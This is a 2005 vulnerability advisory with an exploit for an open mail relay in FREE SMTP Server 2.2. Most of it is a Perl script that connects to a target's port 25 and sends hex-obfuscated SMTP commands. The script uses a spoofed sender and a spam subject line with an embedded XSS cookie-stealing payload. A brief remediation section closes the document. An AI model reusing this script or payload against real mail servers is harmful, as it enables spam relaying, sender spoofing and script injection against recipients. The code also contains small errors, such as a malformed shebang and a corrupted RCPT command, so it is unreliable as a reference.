Update:
1:48 03/09/2005
Subject:
"FREE SMTP Spam Filter Vulnerability"
Version:
FREE SMTP Server 2.2
Operating System:
- WINDOWS 95
- WINDOWS 98
- WINDOWS NT
- WINDOWS XP
Typical software:
- freeware
Vendor URL:
Mail - info@softstack.com
WWW - http://www.softstack.com/
Description:
Free SMTP Server is a free SMTP server program for Windows that enables you to send messages directly from your computer.
This program is used as a relay for sending newsletters, distributing messages to different mailing lists,
sending notifications to your customers, as well as for sending individual messages if you use it with our mass mailer
1st Mass Mailer. You can use it instead of the SMTP server of your Internet Service Provider (ISP).
Vulnerability:
The Bug affected is found at Open smtp relays.The remote host is running a SMTP mail relay. This one could be used to send
emails.It may also be possible to specify wrong sender addresses - This could be used to send spam,malicous code,trojan
,XSS/CSS,worm/virus or junk mail.
Exploit:
#!usr/bin/perl
#
# FREE SMTP Spam Filter Exploit
# ------------------------------------
# Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: http://www.softstack.com/
#
use IO::Socket;
use Socket;
print("\n FREE SMTP Spam Filter Exploit\n");
print(" ---------------------------------\n\n");
# Changes to own feed
$helo = "mail.test"; # HELO
$mfrom = "[support@vuln.test]"; # MAIL FROM
$rcpto = "[root@localhost]"; # RCPT TO
$date = "11 Feb 2099 12:07:10"; # Date
$from = "Micro SEX's"; # From mailer
$subject = "Check the new version.. ооо\n".
"[b]VICKY VETTE[/b][i]is HOT Editon.Check it OUT!!. Free Nude Shop. Sex,video,picture,toys and XXX Chat Adults live!!![/i]".
"[br][a href=http://127.0.0.1 onMouseOver=alert(document.cookie);]Click Here[/a]"; # subject spammmer
if($#ARGV < 0 | $#ARGV > 1) {
die "usage: perl $0 [IP/host] \nExam: perl $0 127.0.0.1 \n" };
$adr = $ARGV[0];
$prt = "25";
# Don't changes this one
$act1 = "\x48\x45\x4c\x4f $helo";
$act2 = "\x4d\x41\x49\x4c \x46\x52\x4f\x4d\x3a$mfrom";
$act3 = "\x52\x43\x50\x54 f\x54\x4f\x3a$rcpto";
$act4 = "\x44\x41\x54\x41";
$act5 = "\x44\x61\x74\x65\x3a $date";
$sub =
"\x46\x72\x6f\x6d\x3a $from".
"\x53\x75\x62\x6a\x65\x63\x74\x3a $subject\x2e".
"\x51\x55\x49\x54";
print "[+] Connect to $adr..\n";
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "[-] Error: can't connect to $adr:$prt\n";
print "[+] Connected!\n";
$remote->autoflush(1);
print "[*] Send HELO..";
print $remote "$act1" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send MAIL FROM..";
print $remote "$act2" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send RCPT TO..";
print $remote "$act3" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send DATA..";
print $remote "$act4" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send DATE..";
print $remote "$act5" or die "\n[-] Error: can't send xploit code\n";
sleep(1);
print "[OK]\n";
print "[*] Send Sub Mail..";
print $remote "$sub" or die "\n[-] Error: can't send xploit code\n";
print "[OK]\n";
print "[*] QUIT..\n";
print "[+] MAIL SPAMWNED!\n\n";
close $remote;
print "press any key to exit..\n";
$bla= [STDIN];
Solution:
The server should be deactivated or de-installed if not necessary.Do not allow everyone to send emails over your
mail relay.And do not allow arbitrary sender addresses to be specified.To make it harder to find the server the
daemon could be configured to listen at another port (e.g. 8025). Try to prevent unwanted connection attempts by
filtering traffic with firewalling. Alternation of the application banner can confuse an attacker and let him
determine the wrong software.
Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com